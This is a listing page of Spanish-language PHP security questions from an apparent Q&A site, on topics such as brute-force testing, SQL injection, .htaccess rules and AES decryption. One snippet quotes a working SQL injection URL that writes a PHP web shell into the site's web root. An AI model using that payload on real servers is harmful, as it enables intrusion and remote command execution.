Preguntas con etiqueta 'php'

preguntas con etiqueta
2
respuestas

Formulario de registro de prueba usando fuerza bruta

Necesito probar si el formulario de registro de mi sitio web puede tener problemas con ataques de fuerza bruta, porque este formulario requiere un código de invitación. ¿Hay alguna herramienta para este tipo de prueba?     
hecha 03.09.2015 - 01:16
1
respuesta

¿Por qué la técnica de Inyección de SQL INTO OUTFILE a veces no funciona? [cerrado]

¿Por qué la técnica de inyección SQL INTO OUTFILE a veces no funciona? http://example.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php" ¿Hay...
hecha 27.09.2015 - 00:35
1
respuesta

¿Es seguro mostrar las páginas de administración solo en ciertos hosts?

Tengo un sitio web público sin base de datos (con contenido estático). Tengo una página de administración, que permite editar contenido estático. Quiero usar esa página solo cuando el sitio web está en mi computadora local pero no cuando está ca...
hecha 30.07.2016 - 13:28
2
respuestas

Posibles problemas de seguridad con la imagen generada a pedido desde la base de datos

Quiero saber cuál podría ser el riesgo potencial con la parte que se muestra de este comportamiento. Para la parte de carga: Un formulario con un archivo cargado para imagen. El contenido de la imagen se guarda en el tipo "longBlob"...
hecha 19.09.2014 - 00:10
1
respuesta

.htaccess carpeta protegida excepto IP

Creé una tienda electrónica con libros electrónicos y se almacenan en una carpeta específica que está protegida por un archivo .htaccess: Order deny,allow deny from all allow from 127.0.0.1 La IP es la IP de la página web, por lo que es ina...
hecha 29.04.2015 - 12:04
2
respuestas

PHP Plugin Security

He estado trabajando en un sistema de automatización del hogar desde hace poco más de un año y le he agregado un sistema de complementos. También he agregado para que otros puedan enviar sus complementos y, si los acepto, se agregan automáticame...
hecha 13.02.2015 - 23:43
1
respuesta

Sospecha de virus en un sitio web creado con el Codeigniter PHP [duplicado]

He recibido un sitio web que utiliza Codeigniter para modificar. El problema es que, a veces, cuando actualizo la página principal, un archivo extraño llamado "descargar" con el ícono de Windows comenzará a descargarse. No estoy seguro de q...
hecha 20.06.2016 - 08:17
1
respuesta

Asegurar la inyección SQL para mis archivos PHP [cerrado]

He hecho un foro de PHP. Utilicé PDO, así como SQLi. Cuando realicé un análisis de seguridad de mi sitio web, encontré errores y, después de un largo tiempo de intentar diferentes cosas, no puedo solucionarlos. Puntos para quien me ayude a ar...
hecha 24.07.2015 - 14:02
1
respuesta

¿Puede hacer un cifrado del lado del cliente y del servidor [duplicado]

Estoy creando un sitio web PHP donde los usuarios, entre otras cosas, pueden iniciar sesión y realizar tareas administrativas. Para sus contraseñas, uso password_hash ($ password) y luego verifico con él, uso password_verify ($ password, $ pas...
hecha 31.10.2015 - 15:25
1
respuesta

AES 128bit descifrado usando una clave de más de 16 bytes

Tengo un pequeño problema con el descifrado AES. Tengo que descifrar un texto que ha sido cifrado usando 128bit AES / ECB con PHP mcrypt. La cuestión es que la clave que se usa para cifrar / descifrar tiene una longitud de 32 bytes en lugar de 1...
hecha 13.11.2014 - 15:54